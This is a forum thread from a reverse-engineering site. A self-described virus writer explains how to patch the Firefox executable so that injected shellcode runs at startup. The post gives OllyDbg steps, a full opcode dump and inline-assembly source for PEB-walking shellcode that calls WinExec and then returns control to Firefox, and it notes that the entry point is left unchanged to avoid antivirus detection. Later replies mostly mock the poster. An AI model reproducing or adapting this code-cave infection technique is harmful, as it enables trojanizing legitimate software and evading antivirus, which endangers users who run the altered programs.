Jump to content
Tuts 4 You

(RE) Mozilla FireFox

JMC31337

By JMC31337
in Reverse Engineering Articles

 Share

Recommended Posts

JMC31337

JMC31337

Posted
Posted (edited)

Tested on FireFox v. 8

First thing is grab OllyDbg and do a search for intermodular calls

in my case i see

00401D6B CALL DWORD PTR DS:[<&KERNEL32.IsDebugger>7C813133 kernel32.IsDebuggerPresent

upon heading to that address i see

CPU Disasm
00401CAF	  CC			INT3
00401CB0  /> \55			PUSH EBP
00401CB1  |.  8BEC		  MOV EBP,ESP
00401CB3  |.  81EC 28030000 SUB ESP,328
00401CB9  |.  A3 38424000   MOV DWORD PTR DS:[404238],EAX
00401CBE  |.  890D 34424000 MOV DWORD PTR DS:[404234],ECX
00401CC4  |.  8915 30424000 MOV DWORD PTR DS:[404230],EDX
00401CCA  |.  891D 2C424000 MOV DWORD PTR DS:[40422C],EBX
00401CD0  |.  8935 28424000 MOV DWORD PTR DS:[404228],ESI
00401CD6  |.  893D 24424000 MOV DWORD PTR DS:[404224],EDI
00401CDC  |.  66:8C15 50424 MOV WORD PTR DS:[404250],SS			  ; Superfluous operand size prefix
00401CE3  |.  66:8C0D 44424 MOV WORD PTR DS:[404244],CS			  ; Superfluous operand size prefix
00401CEA  |.  66:8C1D 20424 MOV WORD PTR DS:[404220],DS			  ; Superfluous operand size prefix
00401CF1  |.  66:8C05 1C424 MOV WORD PTR DS:[40421C],ES			  ; Superfluous operand size prefix
00401CF8  |.  66:8C25 18424 MOV WORD PTR DS:[404218],FS			  ; Superfluous operand size prefix
00401CFF  |.  66:8C2D 14424 MOV WORD PTR DS:[404214],GS			  ; Superfluous operand size prefix
00401D06  |.  9C			PUSHFD
00401D07  |.  8F05 48424000 POP DWORD PTR DS:[404248]
00401D0D  |.  8B45 00	   MOV EAX,DWORD PTR SS:[LOCAL.0]
00401D10  |.  A3 3C424000   MOV DWORD PTR DS:[40423C],EAX
00401D15  |.  8B45 04	   MOV EAX,DWORD PTR SS:[ARG.RETADDR]
00401D18  |.  A3 40424000   MOV DWORD PTR DS:[404240],EAX
00401D1D  |.  8D45 08	   LEA EAX,[ARG.1]
00401D20  |.  A3 4C424000   MOV DWORD PTR DS:[40424C],EAX
00401D25  |.  8B85 E0FCFFFF MOV EAX,DWORD PTR SS:[LOCAL.200]
00401D2B  |.  C705 88414000 MOV DWORD PTR DS:[404188],10001
00401D35  |.  A1 40424000   MOV EAX,DWORD PTR DS:[404240]
00401D3A  |.  A3 3C414000   MOV DWORD PTR DS:[40413C],EAX
00401D3F  |.  C705 30414000 MOV DWORD PTR DS:[404130],C0000409
00401D49  |.  C705 34414000 MOV DWORD PTR DS:[404134],1
00401D53  |.  8B0D 08404000 MOV ECX,DWORD PTR DS:[404008]
00401D59  |.  898D D8FCFFFF MOV DWORD PTR SS:[LOCAL.202],ECX
00401D5F  |.  8B15 0C404000 MOV EDX,DWORD PTR DS:[40400C]
00401D65  |.  8995 DCFCFFFF MOV DWORD PTR SS:[LOCAL.201],EDX
00401D6B  |.  FF15 00304000 CALL DWORD PTR DS:[<&KERNEL32.IsDebugger ; [KERNEL32.IsDebuggerPresent

so i got to thinking as a VXR, when i changed any entrypoint address with PEeditor or otherwise its detected as a variant virus by 2 of jotti's scanners

how do we get around this?? easy..

NOP all that **** out from the bottom (kernel:isdebuggerpresent) to the top (int 3)

then starting at the 00401CAF CC INT3 .... replace with ...

PUSHAD useful to preserve registers BEFORE we hit this opcode

the reason for this working nicely is because the ENTRY POINT to Mozilla is going to be changed to

CPU Disasm

Address Hex dump Command Comments

00401840 /. E8 6A040000 CALL 00401CAF

this way the entry point address in the PE tables of the exe REMAINS THE SAME (AV reasons)

so starting at 00401CAF (in my case) up to 00401D8F

replace all of firefox's opcode to the following... either done by hexeditor or changing it with OllyDBG and copying it to the executable


CPU Disasm
Address   Hex dump		  Command								  Comments
00401CAF   $  60			PUSHAD
00401CB0   >  5D			POP EBP
00401CB1   .  2B2D BA124000 SUB EBP,DWORD PTR DS:[4012BA]			; ASCII "XUL_APP_FILE"
00401CB7   .  31C0		  XOR EAX,EAX
00401CB9	  64			DB 64									; CHAR 'd'
00401CBA   .  A1300000	  DD 000030A1
00401CBE	  00			DB 00
00401CBF	  8B			DB 8B
00401CC0   .  400C8B40	  DD 408B0C40
00401CC4	  0C			DB 0C									; Form Feed
00401CC5	  8B			DB 8B
00401CC6   .  008B008B	  DD 8B008B00
00401CCA	  40			DB 40									; CHAR '@'
00401CCB	  18			DB 18
00401CCC   .  89C78B40	  DD 408BC789
00401CD0	  3C			DB 3C									; CHAR '<'
00401CD1	  8B			DB 8B
00401CD2   .  54387801	  DD 01783854
00401CD6	  FA			DB FA
00401CD7	  8B			DB 8B
00401CD8   .  4A188B5A	  DD 5A8B184A
00401CDC	  20			DB 20									; CHAR ' '
00401CDD	  01			DB 01
00401CDE	  FB			DB FB
00401CDF   .  498B348B	  DD 8B348B49
00401CE3	  01			DB 01
00401CE4	  FE			DB FE
00401CE5	  81			DB 81
00401CE6   .  3E476574	  DD 7465473E
00401CEA	  50			DB 50									; CHAR 'P'
00401CEB	  75			DB 75									; CHAR 'u'
00401CEC	  F2			DB F2
00401CED   .  817E0472	  DD 72047E81
00401CF1	  6F			DB 6F									; CHAR 'o'
00401CF2	  63			DB 63									; CHAR 'c'
00401CF3	  41			DB 41									; CHAR 'A'
00401CF4   .  75E9817E	  DD 7E81E975
00401CF8	  08			DB 08									; Backspace
00401CF9	  64			DB 64									; CHAR 'd'
00401CFA	  64			DB 64									; CHAR 'd'
00401CFB   .  726575E0	  DD E0756572
00401CFF	  66			DB 66									; CHAR 'f'
00401D00	  81			DB 81
00401D01	  7E			DB 7E									; CHAR '~'
00401D02   .  0C737375	  DD 7573730C
00401D06	  D8			DB D8
00401D07	  8B			DB 8B
00401D08	  5A			DB 5A									; CHAR 'Z'
00401D09   .  2401FB66	  DD 66FB0124
00401D0D	  8B			DB 8B
00401D0E	  0C			DB 0C									; Form Feed
00401D0F	  4B			DB 4B									; CHAR 'K'
00401D10	  8B			DB 8B
00401D11   .  5A1C01FB	  DD FB011C5A
00401D15	  8B			DB 8B
00401D16	  04			DB 04
00401D17	  8B			DB 8B
00401D18	  01			DB 01
00401D19   .  F889C368	  DD 68C389F8
00401D1D	  78			DB 78									; CHAR 'x'
00401D1E	  41			DB 41									; CHAR 'A'
00401D1F	  00			DB 00
00401D20	  00			DB 00
00401D21   .  68617279	  DD 79726168
00401D25	  45			DB 45									; CHAR 'E'
00401D26	  68			DB 68									; CHAR 'h'
00401D27	  4C			DB 4C									; CHAR 'L'
00401D28	  69			DB 69									; CHAR 'i'
00401D29	  62			DB 62									; CHAR 'b'
00401D2A	  72			DB 72									; CHAR 'r'
00401D2B	  68			DB 68									; CHAR 'h'
00401D2C	  4C			DB 4C									; CHAR 'L'
00401D2D   .  6F616454	  DD 5464616F
00401D31	  57			DB 57									; CHAR 'W'
00401D32	  FF			DB FF
00401D33	  D0			DB D0
00401D34	  89			DB 89
00401D35	  C2			DB C2
00401D36   .  68786563	  DD 63657868
00401D3A	  00			DB 00
00401D3B   .  6857696E	  DD 6E695768
00401D3F	  45			DB 45									; CHAR 'E'
00401D40	  89			DB 89
00401D41   .  E05057FF	  DD FF5750E0
00401D45	  D3			DB D3
00401D46   .  68 70 61 64 0 ASCII "hpad",0
00401D4B   .  686E6F74	  DD 746F6E68
00401D4F	  65			DB 65									; CHAR 'e'
00401D50	  6A			DB 6A									; CHAR 'j'
00401D51	  01			DB 01
00401D52	  44			DB 44									; CHAR 'D'
00401D53	  44			DB 44									; CHAR 'D'
00401D54	  44			DB 44									; CHAR 'D'
00401D55   .  448D3424	  DD 24348D44
00401D59	  6A			DB 6A									; CHAR 'j'
00401D5A	  01			DB 01
00401D5B	  56			DB 56									; CHAR 'V'
00401D5C	  FF			DB FF
00401D5D	  D0			DB D0
00401D5E	  5D			DB 5D									; CHAR ']'
00401D5F	  5D			DB 5D									; CHAR ']'
00401D60	  5D			DB 5D									; CHAR ']'
00401D61   .  5D5D5D5D	  DD 5D5D5D5D
00401D65	  5D			DB 5D									; CHAR ']'
00401D66	  61			DB 61									; CHAR 'a'
00401D67	  83			DB 83
00401D68	  EC			DB EC
00401D69	  04			DB 04
00401D6A	  31			DB 31									; CHAR '1'
00401D6B	  C0			DB C0
00401D6C	  B9			DB B9
00401D6D   .  B0FF1200	  DD 0012FFB0
00401D71	  BB			DB BB
00401D72   .  00E0FD7F	  DD 7FFDE000
00401D76	  BC			DB BC
00401D77	  C0			DB C0
00401D78	  FF			DB FF
00401D79	  12			DB 12
00401D7A	  00			DB 00
00401D7B	  BD			DB BD
00401D7C	  F0			DB F0
00401D7D	  FF			DB FF
00401D7E	  12			DB 12
00401D7F	  00			DB 00
00401D80	  BE			DB BE
00401D81	  6F			DB 6F									; CHAR 'o'
00401D82	  75			DB 75									; CHAR 'u'
00401D83	  4A			DB 4A									; CHAR 'J'
00401D84   .  00BF30B4	  DD B430BF00
00401D88	  12			DB 12
00401D89   .  00E971FE	  DD FE71E900
00401D8D	  FF			DB FF
00401D8E	  FF			DB FF
00401D8F   .  90909090	  DD 90909090

save.. what happens is that is a modded up version of an opcode used to travers the PEB and to WinExec notepad... then once notepad is executed it sends the "flow" back to Fox's normal execution point which would normally take place after that first "normal" call to ---> 00401C00 /. 83EC 10 SUB ESP,10

and normal Fox operations proceed

NOTE:

00401D66 61 DB 61 ; CHAR 'a'

is a POPAD instruction.. when we pushad to preserve registers we pop ebp about 8 times to remove the left over crap from WinExec off the stack.. leaving all the values of the PUSHAD

i chose POPAD for this quick scenario because i hard coded the values of the registers myself before calling the

00401C00 /. 83EC 10 SUB ESP,10

you could easily perform operations such as

mov eax,0

mov ecx,[esp+x]

mov edx,[esp+x]

mov ebx,[esp+x]

esi edi ebp esp the same way.. where X is some value on the stack.. i'll leave that up to you (also verified)

posted the notepad modded up opcode all over the net but for simplicity sake under Dev-C++ it looks like this


//Dev-C++
//ADD -masm=intel to Compiler Options
int main()
{
	asm(
	"Delta:\n\t\t"
	"pop ebp\n\t\t"
	"sub ebp, Delta\n\t\t"
	"xor	 eax, eax\n"
	"mov	 eax, [fs:0x30]\n"
	"mov	 eax, [eax+0x0c]\n"  
	"mov   eax,dword ptr [eax + 0x0C]\n"	
	"mov   eax, dword ptr [eax]\n"
	"mov   eax, dword ptr [eax]\n"
	"mov   eax, dword ptr [eax+0x18]\n" //EAX HAS THE KERNEL BASE ADDRESS
	"mov   edi,eax\n"							// edi = eax = kernel32.BaseAddress
	"mov   eax,dword ptr [eax + 0x3C]\n"		  // offset to start of PE header
	"mov   edx,dword ptr [eax + 0x78 + edi]\n"	// IMAGE_EXPORT_DIRECTORY--->RVA
	"add   edx,edi\n"							// IMAGE_EXPORT_DIRECTORY--->VA  = edx
	"mov   ecx,dword ptr [edx + 0x18]\n"		  // ecx = NumberOfNames
	"mov   ebx,dword ptr [edx + 0x20]\n"		  // ebx = AddressOfNames
	"add   ebx,edi\n"
	"_Index:\n"
	"dec   ecx\n"								// ecx --- NumberOfNames ???? ---- ????????
	"mov   esi,dword ptr [ebx + ecx * 4]\n"	  // Name -- RVA
	"add   esi,edi\n"
	"cmp   dword ptr [esi],0x50746547\n"	//PteG
	"jnz   _Index\n"
	"cmp   dword ptr [esi + 0x04],0x41636f72\n" //Acor
	"jnz   _Index\n"
	"cmp   dword ptr [esi + 0x08],0x65726464\n" //erdd
	"jnz   _Index\n"
	"cmp   word  ptr [esi + 0x0C],0x7373\n" //ss
	"jnz   _Index\n"
	"mov   ebx,dword ptr [edx + 0x24]\n"		  // AddressOfNameOridinals --- ?????
	"add   ebx,edi\n"
	"mov	cx, word ptr [ebx + ecx * 2]\n"
	"mov   ebx,dword ptr [edx + 0x1C]\n"		 // ebx = AddressOfFunctions
	"add   ebx,edi\n"
	"mov   eax,dword ptr [ebx + ecx * 4]\n"
	"add   eax,edi\n"					  // GetProcAddress ---- ????
	"mov   ebx,eax\n"
	"push	0x4178\n"					  
	"push	0x45797261\n"
	"push	0x7262694c\n"
	"push	0x64616f4c\n"
	"push	esp\n"
	"push	edi\n"
	"call	eax\n"
	"mov	 edx,eax\n"
	"push 0x00636578\n"
	"push 0x456E6957\n"
	"mov	 eax, esp\n"
	"push	eax\n"
	"push	edi\n"
	"call	ebx\n"
	"push 0x00646170\n"
	"push 0x65746F6E\n"
	"push	1\n"
	"inc esp\n"
	"inc esp\n"
	"inc esp\n"
	"inc esp\n"
	"lea esi,[esp]\n"
	"push 1\n"
	"push	esi\n"
	"call	eax\n"	//YEA POOR EXITING... <exitprocess calling would work>
	//"push	0x0040136E\n"
	//"ret\n"
	"leave\n"
	);
}

the original opcode to the above (from baidu) can be seen if you google....

reason for removing the emit is because once you hard code bytes into your ASM file(exe) with [emit] the OS will give the array structure a memory address from the imagebase (just the way it works)

so now NO HARD CODED memory addresses (which is what yu want so its more cross system compatible)

nothing great.. but it works for me.. on XP SP3 system..

Edited by JMC31337
metr0

metr0

Posted
Posted

What are you doing there? I don't understand what's the goal of this post, some shellcode thing?

  • Like 1
evlncrn8

evlncrn8

Posted
Posted

trying to be leet from the looks of things, blinding us with his/her new found knowledge about 10 years too late...

begone skript kiddie

JMC31337

JMC31337

Posted
  • Author
Posted (edited)

What are you doing there? I don't understand what's the goal of this post, some shellcode thing?

yea embedding shellcode into a mozilla firefox cave...

changing the entry point call to that shellcode then releasing control back to fox

Since ya cant add a new section to Fox without overwriting the DLL's so.. this is how i added code

sorry if it aint good nuff for ya'll

:)

Edited by JMC31337
JMC31337

JMC31337

Posted
  • Author
Posted

trying to be leet from the looks of things, blinding us with his/her new found knowledge about 10 years too late...

begone skript kiddie

yea sorry i'll keep working on my bash and batch scripts... PUT ME IN COACH! I'll get better!!

evlncrn8

evlncrn8

Posted
Posted (edited)

really pathetic to be honest.. both your reply and the code...

"inc esp\n" "inc esp\n" "inc esp\n" "inc esp\n" "

great code there :P

and "Since ya cant add a new section to Fox without overwriting the DLL's so.. this is how i added code sorry if it aint good nuff for ya'll"

realy? overwriting dlls? huh?

Edited by evlncrn8
JMC31337

JMC31337

Posted
  • Author
Posted

yea you were right.. the parasite at Rohitab works, my stage 1 parasite works, PE editor works... i had fox in the wrong directory when i went to run it

But im kinda glad i did **** up... never woulda fig'd how to avoid the opcodes EMIT sections

so.. how wouldya add a new section to NOTEPAD without the above tricks??

stellios

stellios

Posted
Posted

Just wasted 5 minutess of my life reading this post, I want my 5 minutes back !!

  • Like 1
evlncrn8

evlncrn8

Posted
Posted

how would i add a new section to notepad?

grow the **** up!, you are trying to impress us with stuff you learn when cracking.. yes, learn.. not steal from some script kiddies post on a site pretty much catering for script / coding noobs (batch scripts etc.. gtfo)

Teddy Rogers

Teddy Rogers

Posted
Posted

Let us keep our replies on topic please. Comments are welcome as long as they are constructive, if your going to lower the tone it's probably better left unsaid...

Ted.

JMC31337

JMC31337

Posted
  • Author
Posted

boxing.gif

PUT ME IN COACH!!!

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...